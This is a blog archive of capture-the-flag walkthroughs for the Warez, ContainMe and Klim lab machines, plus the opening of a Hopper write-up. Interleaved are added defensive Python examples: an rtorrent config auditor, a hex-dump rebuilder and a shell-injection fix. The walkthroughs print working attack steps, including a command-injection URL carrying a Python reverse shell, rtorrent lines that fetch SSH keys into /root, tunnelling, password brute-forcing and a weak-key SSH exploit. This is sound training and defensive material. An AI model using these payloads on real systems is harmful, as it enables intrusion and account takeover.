Author archive: webmaster

HackMyVm Warez Simple Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Warez

Two key steps.

First step: use the Aria2 WebUI to download an authorized_keys file into /home/carolina/.ssh, then we can log in via SSH as user carolina.


Second step: use rtorrent to download authorized_keys again, this time into /root/.ssh.

```bash
carolina@warez:~$ tail .rtorrent.rc
# SCGI Connectivity (for alternative rtorrent interfaces, XMLRPC)
# Use a IP socket with scgi_port, or a Unix socket with scgi_local.
# schedule can be used to set permissions on the unix socket.
#
#network.scgi.open_port = "127.0.0.1:5000"
#network.scgi.open_local = (cat,(session.path),/rpc.sock)
#schedule2 = socket_chmod, 0, 0, "execute.nothrow=chmod,770,(cat,(session.path),/rpc.sock)"
execute.throw = mkdir,/root/.ssh
execute.throw = wget,http://192.168.56.150/authorized_keys,-O,/root/.ssh/authorized_keys
```
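
The two `execute.throw` lines are the whole trick: rtorrent runs them on startup, so anyone who can write `.rtorrent.rc` for an account gets a command run as that account. The checker below is an added example, not part of the walkthrough: it flags uncommented directives in an rtorrent config that execute a program, either directly (`execute*` keys) or embedded in another directive's command string (a `schedule2` wrapping `execute.nothrow`, as in the commented-out line above). The sample config is constructed here from the lines shown above plus one invented `schedule2` entry.

```python
#!/usr/bin/env python3
"""Audit an rtorrent configuration for directives that run external commands.

Added example. SAMPLE_RC is constructed for the demo; the two execute.throw
lines mirror the ones found on the Warez machine, the schedule2 line is invented.
"""

SAMPLE_RC = """\
# constructed sample ~/.rtorrent.rc
directory.default.set = ~/Downloads
#network.scgi.open_port = "127.0.0.1:5000"
#schedule2 = socket_chmod, 0, 0, "execute.nothrow=chmod,770,(cat,(session.path),/rpc.sock)"
schedule2 = nightly, 0, 86400, "execute.nothrow=/usr/local/bin/backup.sh"
execute.throw = mkdir,/root/.ssh
execute.throw = wget,http://192.168.56.150/authorized_keys,-O,/root/.ssh/authorized_keys
"""


def audit_rtorrent_rc(text):
    """Return one finding per live (uncommented) line that can execute a program."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                         # comments are inert
        key, _, value = line.partition("=")  # split at the first '=' only
        key, value = key.strip(), value.strip()
        if key.startswith("execute"):        # execute, execute.throw, execute.nothrow, ...
            reason = "execute directive"
        elif "execute" in value:             # e.g. schedule2 / method.insert carrying a command
            reason = f"{key} embeds an execute command"
        else:
            continue
        findings.append({
            "line": lineno,
            "key": key,
            "value": value,
            "reason": reason,
            # writing into an .ssh directory is the classic persistence sign
            "touches_ssh": ".ssh" in value,
        })
    return findings


if __name__ == "__main__":
    for f in audit_rtorrent_rc(SAMPLE_RC):
        flag = " [SSH!]" if f["touches_ssh"] else ""
        print(f"line {f['line']}: {f['reason']}{flag}: {f['key']} = {f['value']}")
```

Run it against every `.rtorrent.rc` on a host where rtorrent is installed; the `touches_ssh` flag is the cheap heuristic for the exact persistence shown above, but any live `execute` directive deserves a look.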

Vulnhub ContainMe: 1 Walkthrough

https://www.vulnhub.com/entry/containme-1,729/

Interesting machine. It needs ELF analysis, multi-layer port forwarding, etc. I learned new things.

Scan ports.

```bash
~ nmap -sV -sC -p- 192.168.33.142 -oN ports.log
...
22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 ec:5f:8a:1d:59:b3:59:2f:49:ef:fb:f4:4a:d0:1d:7a (ECDSA)
|_  256 b1:4a:22:dc:7f:60:e4:fc:08:0c:55:4f:e4:15:e0:fa (ED25519)
80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  EtherNetIP-1?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
8022/tcp open  ssh           OpenSSH 7.7p1 Ubuntu 4ppa1+obfuscated (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:ae:ea:27:3f:ab:10:ae:8c:2e:b3:0c:5b:d5:42:bc (RSA)
|   256 67:29:75:04:74:1b:83:d3:c8:de:6d:65:fe:e6:07:35 (ECDSA)
|_  256 7f:7e:89:c4:e0:a0:da:92:6e:a6:70:45:fc:43:23:84 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Scan port 80.

```bash
~ gobuster dir -u http://192.168.33.142 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
===============================================================
/info.php             (Status: 200) [Size: 68948]
/index.html           (Status: 200) [Size: 10918]
/index.php            (Status: 200) [Size: 329]
```

Check index.php: it lists the files of the current directory.

```bash
~ curl http://192.168.33.142/index.php
<html>
<body>
        <pre>
        total 28K
drwxr-xr-x 2 root root 4.0K Jul 16 11:40 .
drwxr-xr-x 3 root root 4.0K Jul 15 17:11 ..
-rw-r--r-- 1 root root  11K Jul 15 17:11 index.html
-rw-r--r-- 1 root root  154 Jul 16 11:40 index.php
-rw-r--r-- 1 root root   20 Jul 15 17:27 info.php
        <pre>

<!--  where is the path ?  -->

</body>
</html>
```

Maybe index.php has an LFI. Fuzz the parameter name.

```bash
~ wfuzz -u 'http://192.168.33.142/index.php?FUZZ=id' --hh 329 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000013516:   200        10 L     13 W       79 Ch       "path"
```

It turns out to be command injection: the value of path reaches a shell.

```bash
~ curl 'http://192.168.33.142/index.php?path=;id'; ...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
...
```

Get a reverse shell as www-data.

```bash
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.142.
Ncat: Connection from 192.168.33.142:60146.
bash: cannot set terminal process group (242): Inappropriate ioctl for device
bash: no job control in this shell
www-data@host1:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@host1:/var/www/html$
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ curl 'http://192.168.33.142/index.php?path=;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.33.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22%2fbin%2fbash%22,%22-i%22%5D);%27'
```

Now we have a reverse shell on host1. In /home/mike there is an interesting file named 1cryptupx.

```bash
www-data@host1:/home/mike$ ls -la
ls -la
total 384
drwxr-xr-x 5 mike mike 4096 Jul 30 04:36 .
drwxr-xr-x 3 root root 4096 Jul 19 15:03 ..
lrwxrwxrwx 1 root mike 9 Jul 19 15:06 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 mike mike 3771 Apr 4 2018 .bashrc
drwx------ 2 mike mike 4096 Jul 30 04:36 .cache
drwx------ 3 mike mike 4096 Jul 30 04:36 .gnupg
-rw-r--r-- 1 mike mike 807 Apr 4 2018 .profile
drwx------ 2 mike mike 4096 Jul 19 15:27 .ssh
-rwxr-xr-x 1 mike mike 358668 Jul 30 04:39 1cryptupx
```

Running 1cryptupx with any string argument just prints a decompress error.

```bash
www-data@host1:/home/mike$ ./1cryptupx string
./1cryptupx string
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝

Unable to decompress.
```

We need to get 1cryptupx onto the local Kali box. Here I use xxd through the injection point to print the file as hex.

```bash
curl 'http://192.168.33.142/index.php?path=;xxd%20-ps%20/home/mike/1cryptupx';
...
0f7fb80039b93030919edc6e21ff1f407f40342f624343421f9e7f281839
f2788f787f88ffec8617bba37f0090ff807fb9d845c1d87fac7fe04d143c
39e0101a7fb292b393a1ffab9b7f680739f24226c468b268a2e1b8281808
ffd27fd19edc6e1f807f70e098ff3b902f36d77f604b4e28ff2d76c145eb
7f302f812d98867f277f0fa6db548103af977ff4ff9224098b00002a49ff
000000005550582100000000555058210d1608096e14e678c6222cc76007
000042020000d0a90d00491b00a2f4000000
<pre>

<!-- where is the path ? -->

</body>
</html>
```

Then rebuild 1cryptupx from the hex in CyberChef.
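
CyberChef is convenient, but the dump above is noisy: the page wraps the hex in HTML, the author elided the middle, and a copy-paste error silently produces a file that upx refuses. The script below is an added example (not part of the walkthrough) that rebuilds the file from `xxd -ps` output and checks the magic bytes: `\x7fELF` at offset 0, and the `UPX!` marker that is visible in the last lines of the dump (`55505821`). It keeps only lines made purely of hex digits, because stripping non-hex characters would pull the letters a to f out of `<body>` or `<pre>` into the binary. The sample input is constructed from the dump's last two lines plus an invented ELF header line.

```python
#!/usr/bin/env python3
"""Rebuild a binary from `xxd -ps` output and identify it by its magic bytes.

Added example. SAMPLE_DUMP combines the tail of the ContainMe dump (real lines)
with a made-up first line carrying an ELF magic, so the demo runs offline.
"""
import binascii
import re

HEX_LINE = re.compile(r"^[0-9a-fA-F]+$")   # xxd -ps emits nothing but hex digits per line

ELF_MAGIC = b"\x7fELF"   # first four bytes of every ELF file
UPX_MAGIC = b"UPX!"      # marker UPX leaves in packed files

SAMPLE_DUMP = """\
~ curl 'http://192.168.33.142/index.php?path=;xxd%20-ps%20/home/mike/1cryptupx';
<html>
<body>
        <pre>
7f454c460201010000000000000000000200000000000000000000000000
...
000000005550582100000000555058210d1608096e14e678c6222cc76007
000042020000d0a90d00491b00a2f4000000
<pre>

<!-- where is the path ? -->

</body>
</html>
"""


def xxd_ps_to_bytes(text):
    """Join the pure-hex lines of an `xxd -ps` dump back into bytes.

    HTML, prompts and '...' lines are dropped; an odd digit count means the
    dump was cut off somewhere, so refuse rather than silently drop a nibble.
    """
    hexdigits = "".join(line.strip() for line in text.splitlines()
                        if HEX_LINE.match(line.strip()))
    if len(hexdigits) % 2:
        raise ValueError("odd number of hex digits: dump is truncated or corrupted")
    return binascii.unhexlify(hexdigits)


def identify(data):
    """Report what the magic bytes say about the rebuilt file."""
    return {
        "size": len(data),
        "elf": data.startswith(ELF_MAGIC),
        "upx_markers": data.count(UPX_MAGIC),
    }


if __name__ == "__main__":
    blob = xxd_ps_to_bytes(SAMPLE_DUMP)
    info = identify(blob)
    print(f"{info['size']} bytes, ELF={info['elf']}, UPX markers={info['upx_markers']}")
    with open("rebuilt.bin", "wb") as fh:
        fh.write(blob)
```

On the real dump, compare `size` against the 358668 bytes that `ls -la` reported on host1 before handing the file to `upx -d`; a mismatch means lines were lost in the transfer.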


Use upx to decompress.

```bash
~ upx -d -o dec 1cryptupx
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
    895440 <-    358668   40.05%   linux/amd64   dec

Unpacked 1 file.
```

Decompile the file in Ghidra. The string "Unable to decompress" leads to the key function.

```c
undefined8 FUN_004016ad(int param_1,long param_2)

{
  ...
  if (param_1 == 2) {
    uVar3 = *(undefined8 *)(param_2 + 8);
    uStack1056 = 0x401721;
    iVar1 = thunk_FUN_004010d6(uVar3,&DAT_004955cb);
    pcVar4 = "\nYou wish!";
    if (iVar1 != 0) {
      uStack1056 = 0x40173a;
      thunk_FUN_0040101e(auStack1048,uVar3);
      uStack1056 = 0x401742;
      lVar2 = thunk_FUN_004010d6(auStack1048);
      if (auStack1048[lVar2 + -1] == '\n') {
        auStack1048[lVar2 + -1] = 0;
      }
      uStack1056 = 0x40175d;
      uVar3 = FUN_00401d90(auStack1048,"$2b$15$TXl.yuAF49958vsn1dqPfe");
      uStack1056 = 0x40176c;
      iVar1 = thunk_FUN_004010d6(uVar3,
                                 "$2b$15$TXl.yuAF49958vsn1dqPfeR9YpyBuWAZrm/dTG5vuG6m3kJkMXWm6");
      if (iVar1 == 0) {
        uStack1056 = 0x40177b;
        FUN_00453290(0,0,0);
        uStack1056 = 0x401787;
        FUN_0041ddc0("/bin/bash");
        return 0;
      }
      pcVar4 = "Unable to decompress.";
    }
    uStack1056 = 0x401795;
    FUN_0041eaa0(pcVar4);
  }
  return 0;
}
```

This function hashes our input with bcrypt and compares it against a hard-coded hash string. If the password matches, it calls "/bin/bash" as root.

We save the hash string into hash.txt.

```bash
~ echo '$2b$15$TXl.yuAF49958vsn1dqPfeR9YpyBuWAZrm/dTG5vuG6m3kJkMXWm6' > hash.txt
```

Use john to brute force the hash.

```bash
~ john --wordlist=/usr/share/wordlists/seclists/Passwords/Common-Credentials/10k-most-common.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mike             (?)
1g 0:00:02:03 DONE (2021-08-31 20:36) 0.008120g/s 1.461p/s 1.461c/s 1.461C/s internet..john
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

Now we have the password for the binary.

Search for SUID files.

```bash
www-data@host1:/home/mike$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/share/man/zh_TW/crypt
/usr/bin/newuidmap
/usr/bin/newgidmap
...
```

Notice the first file. Running crypt with the password gives us root on host1.

```bash
www-data@host1:/home/mike$ /usr/share/man/zh_TW/crypt mike
/usr/share/man/zh_TW/crypt mike
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝
root@host1:/home/mike# id
uid=0(root) gid=33(www-data) groups=33(www-data)
```

Check the local IPs: there is an interesting address in another network range.

```bash
root@host1:/home/mike# ifconfig
...
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.20.2  netmask 255.255.255.0  broadcast 172.16.20.255
        inet6 fe80::216:3eff:fe46:6b29  prefixlen 64  scopeid 0x20<link>
...
```
Scan this range for live hosts with a bash loop; 172.16.20.6 is up.

```bash
root@host1:~# for i in {1..254} ;do (ping 172.16.20.$i -c 1 -w 5  >/dev/null && echo "172.16.20.$i" &) ;done
172.16.20.2
172.16.20.6
```

Scan host2 for open ports.

```bash
for port in {1..65535}; do
  echo >/dev/tcp/172.16.20.6/$port &&
    echo "port $port is open"
done 2>/dev/null |grep open
...
port 22 is open
```

Here it is a little tricky. We can log in to host2 as mike with the id_rsa of mike found on host1.

```bash
root@host1:/# cd /home/mike/.ssh/
root@host1:/home/mike/.ssh# ssh mike@172.16.20.6 -i id_rsa

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Mon Jul 19 20:23:18 2021 from 172.16.20.2
mike@host2:~$
```

Check the local ports of host2: MySQL is listening on localhost.

```bash
mike@host2:/home$ ss -ntlp
State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port
LISTEN   0        80             127.0.0.1:3306          0.0.0.0:*
LISTEN   0        128        127.0.0.53%lo:53            0.0.0.0:*
LISTEN   0        128              0.0.0.0:22            0.0.0.0:*
LISTEN   0        128                 [::]:22               [::]:*
```

We need to forward port 3306 out to Kali in order to brute-force it.

First, on host1, we use ssh -L to map host2:3306 ==> host1:3306.

```bash
root@host1:/home/mike/.ssh# ssh -g -L 3306:127.0.0.1:3306 mike@172.16.20.6 -i id_rsa
```

Check the ports on host1: 3306 is now open.

```bash
root@host1:~# ss -ntlp
State   Recv-Q   Send-Q      Local Address:Port      Peer Address:Port
LISTEN  0        128         127.0.0.53%lo:53             0.0.0.0:*       users:(("systemd-resolve",pid=138,fd=13))
LISTEN  0        128               0.0.0.0:22             0.0.0.0:*       users:(("sshd",pid=199,fd=3))
LISTEN  0        128             127.0.0.1:3306           0.0.0.0:*       users:(("ssh",pid=1870,fd=5))
LISTEN  0        128                     *:80                   *:*       users:(("apache2",pid=613,fd=4),("apache2",pid=602,fd=4),("apache2",pid=592,fd=4),("apache2",pid=457,fd=4),("apache2",pid=375,fd=4),("apache2",pid=270,fd=4),("apache2",pid=269,fd=4),("apache2",pid=268,fd=4),("apache2",pid=257,fd=4))
LISTEN  0        128                  [::]:22                [::]:*       users:(("sshd",pid=199,fd=4))
LISTEN  0        128                 [::1]:3306              [::]:*       users:(("ssh",pid=1870,fd=4))
```

Then we need to map host1:3306 out to Kali, but host1 is restricted, so neither ssh nor socat works there. We have to use chisel.

On kali, run chisel server.

```bash
~ ./chisel server -p 8080 --reverse
2021/09/01 13:26:59 server: Reverse tunnelling enabled
2021/09/01 13:26:59 server: Fingerprint QJGGHnimzCp6x3qmFZtvSyGo1ycXNZT7o9iyG537DF8=
2021/09/01 13:26:59 server: Listening on http://0.0.0.0:8080
```

Then on host1, run chisel client.

```bash
root@host1:~# ./chisel client http://192.168.33.128:33060 R:3306:127.0.0.1:33060
```

Now check the ports on Kali: 3306 is open.

The path is: kali:3306 ==> host1:3306 ==> host2:3306.

```bash
~ ss -ntlp
State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port
LISTEN   0        50             127.0.0.1:9614          0.0.0.0:*
LISTEN   0        511            127.0.0.1:6463          0.0.0.0:*
LISTEN   0        4096                   *:3306                *:*
LISTEN   0        4096                   *:8080                *:*
```

Use medusa on Kali to brute-force the MySQL password.

```bash
~ medusa -h 127.0.0.1 -M mysql -u mike -P /usr/share/wordlists/rock_ascii.txt -t 50
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
...
ACCOUNT FOUND: [mysql] Host: 127.0.0.1 User: mike Password: password [SUCCESS]
...
```

Next, on host2, log in to MySQL and read the password of root from the users table.

```bash
mysql> select * from users;
+-------+---------------------+
| login | password            |
+-------+---------------------+
| root  | bjsig4868fgjjeog    |
| mike  | WhatAreYouDoingHere |
+-------+---------------------+
2 rows in set (0.00 sec)
```

su to root on host2. mike.zip is in /root.

```bash
root@host2:~# ls -la
total 28
drwx------  4 root root 4096 Jul 19 20:35 .
drwxr-xr-x 22 root root 4096 Jun 29 08:07 ..
lrwxrwxrwx  1 root root    9 Jul 19 20:32 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Jul 15 14:47 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Jul 15 14:41 .ssh
-rw-------  1 root root  218 Jul 16 02:26 mike.zip
```

Unzip mike.zip with the password from the database to get the final flag.

```bash
root@host2:~# unzip mike.zip
Archive:  mike.zip
[mike.zip] mike password:
 extracting: mike
root@host2:~# cat mike
THM{_Y0U_F0UND_TH3_C0NTA1N3RS_}
root@host2:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
host2
```

HackMyVm Klim Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Klim

Scan ports.

```bash
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for 192.168.56.100
Host is up (0.0024s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 81:f5:0a:b3:b5:0d:a6:ed:ce:53:93:05:15:17:b1:b0 (RSA)
|   256 fd:7c:3d:73:f6:a4:c1:74:7b:41:27:68:ec:54:c4:61 (ECDSA)
|_  256 8c:28:b7:7b:5d:5c:f1:29:91:4e:85:34:26:55:ac:c6 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Ubuntu Default Page: It works Annex02!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Scan port 80; there is a WordPress site.

```bash
/index.html (Status: 200) [Size: 11331]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
```

wpscan against /wordpress finds nothing useful. Manually checking /wp-content/uploads turns up an image.

```bash
~ wget http://192.168.56.100/wordpress/wp-content/uploads/2021/07/image.jpg
```
stegseek finds the passphrase and extracts the hidden file, dump.
```bash
~ stegseek image.jpg /usr/share/wordlists/rock_ascii.txt
StegSeek version 0.5
Progress: 10.94% (15259007 bytes)

[i] --> Found passphrase: "ichliebedich"
[i] Original filename: "dump"
[i] Extracting to "image.jpg.out"
~ mv image.jpg.out dump
```
Found login credentials in dump.
```bash
~ cat dump|grep pwd
log=klim&pwd=ss7WhrrnnHOZC%239bQn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.0.26%2Fwordpress%2Fwp-admin%2F&testcookie=1
~ python3 -c "import urllib.parse;print(urllib.parse.unquote('ss7WhrrnnHOZC%239bQn'))"
ss7WhrrnnHOZC#9bQn
```
Log in to WordPress. In the Plugin Editor, modify one PHP file and add your PHP shell code to the source.

Then request the modified file to get a reverse shell.
```bash
~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:57032.
Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
 04:51:34 up 29 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Check sudo -l of www-data.
```bash
www-data@klim:/home/klim$ sudo -l
sudo -l
Matching Defaults entries for www-data on klim:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on klim:
    (klim) NOPASSWD: /home/klim/tool
```
Decompile tool and read the source. It effectively runs "cat argv[1]" through system().
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rbx
  size_t v4; // rax
  char s[5]; // [rsp+1Bh] [rbp-25h] BYREF
  char *dest; // [rsp+20h] [rbp-20h]
  size_t size; // [rsp+28h] [rbp-18h]

  strcpy(s, "cat ");
  v3 = strlen(s);
  size = v3 + strlen(argv[1]) + 1;
  dest = (char *)malloc(size);
  strncpy(dest, s, size);
  v4 = strlen(s);
  strncat(dest, argv[1], size - v4);
  system(dest);
  return 0;
}
```

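
The bug in `tool` is the same one as in ContainMe's index.php (`path=;id`): user input is glued into a string that a shell then parses, so a `;` ends the intended command and starts another. The Python below is an added example, not code from either machine, showing the vulnerable pattern beside its fix: resolve the requested path, refuse anything outside a base directory, and pass it to the program as one argv element so no shell is involved. The `demo()` function runs both versions on a scratch directory; the directory name, file name and the `; echo INJECTED` payload are all constructed here.

```python
#!/usr/bin/env python3
"""Shell-string concatenation versus an argv list.

Added example. list_unsafe reproduces the pattern behind index.php on ContainMe
and /home/klim/tool on Klim; list_safe is the hardened form.
"""
import os
import subprocess
import tempfile


def list_unsafe(path):
    """Vulnerable: `path` is parsed by /bin/sh, so ';' starts a second command."""
    result = subprocess.run("ls -la " + path, shell=True,
                            capture_output=True, text=True)
    return result.stdout + result.stderr


def list_safe(path, base):
    """Hardened: no shell, and the target must stay inside `base`."""
    base = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base, path))
    # commonpath catches ../ traversal and absolute paths alike
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"refusing path outside {base}: {path!r}")
    if not os.path.exists(target):
        raise FileNotFoundError(target)
    # argv list: '; echo x' is just a (nonexistent) file name here, never a command
    result = subprocess.run(["ls", "-la", "--", target],
                            capture_output=True, text=True, check=True)
    return result.stdout


def demo():
    """Run both versions on a scratch directory and report what each one did."""
    with tempfile.TemporaryDirectory() as base:
        open(os.path.join(base, "notes.txt"), "w").close()   # constructed content
        payload = base + "; echo INJECTED"                   # the ';id' trick, made harmless
        outcomes = {
            "unsafe_executed_second_command": "INJECTED" in list_unsafe(payload),
            "safe_lists_dir": "notes.txt" in list_safe(".", base),
        }
        try:
            list_safe("; echo INJECTED", base)
        except FileNotFoundError:
            outcomes["safe_treats_payload_as_filename"] = True
        try:
            list_safe("../../../../etc", base)
        except ValueError:
            outcomes["safe_blocks_traversal"] = True
        return outcomes


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

For the Klim case the sudo rule makes it worse: `(klim) NOPASSWD: /home/klim/tool` turns every input `tool` accepts into a command run as klim, so the wrapper needs the argv-list form and a path check, and the sudoers entry needs a review of why a file-reading helper is allowed at all.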
Get the SSH key of user klim.

```bash
www-data@klim:/home/klim$ sudo -u klim ./tool .ssh/id_rsa
sudo -u klim ./tool .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA0IBOKXuvWzdN/rTJXWZ7b1FadoLr5jQZ+LkaEJDWaUnYFlCpNd4e
...
jwq/pz/4h+tzLkK+HocyYZFSZ+3Q3Rv4CK7HeWC80rfLNsc3ZktG755/WQLlXCSJ50sUmp
Fp3Lkp1BGomrgELk4qqf3aF291nYcnSZVu0AfvlRWHHa52o23nuhu/rdcTQX5Lh4kWhWyz
49he3VMR4O2JnBj2dwAAAAlrbGltQGtsaW0=
-----END OPENSSH PRIVATE KEY-----
www-data@klim:/home/klim$
```

Log in via SSH as klim.

```bash
~ ssh klim@192.168.56.100 -i id_rsa
Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 25 12:19:50 2021 from 192.168.0.28
/usr/bin/xauth:  file /home/klim/.Xauthority does not exist
klim@klim:~$ id
uid=1000(klim) gid=1000(klim) groupes=1000(klim),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```

There is an id_rsa.pub in /opt. Following the author's hint, look at openssl.

```bash
~ searchsploit openssl ...
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py
...
```

Follow the steps in the PoC.

```bash
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
tar -jxvf 5622.tar.bz2
python 5720.py rsa/2048 192.168.56.100 root 22
Tested 9979 keys | Remaining 22789 keys | Aprox. Speed 25/sec

Key Found in file: 54701a3b124be15d4c8d3cf2da8f0139-2005
Execute: ssh -lroot -p22 -i rsa/2048/54701a3b124be15d4c8d3cf2da8f0139-2005 192.168.56.100

Tested 10001 keys | Remaining 22767 keys | Aprox. Speed 4/sec
```

Get a root login.

```bash
~ ssh root@192.168.56.100 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
...
root@klim:~# id;hostname
uid=0(root) gid=0(root) groupes=0(root)
klim
```

HackMyVm Hopper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hopper

Scan ports.

```bash
~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 11:29 CST
Nmap scan report for bogon (192.168.56.100)
Host is up (0.00079s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 fc:84:7e:5d:15:85:4d:01:d3:7b:5a:00:de:a4:73:37 (RSA)
|   256 54:f5:ea:db:a0:38:e2:c8:5a:db:30:91:3e:78:b4:b9 (ECDSA)
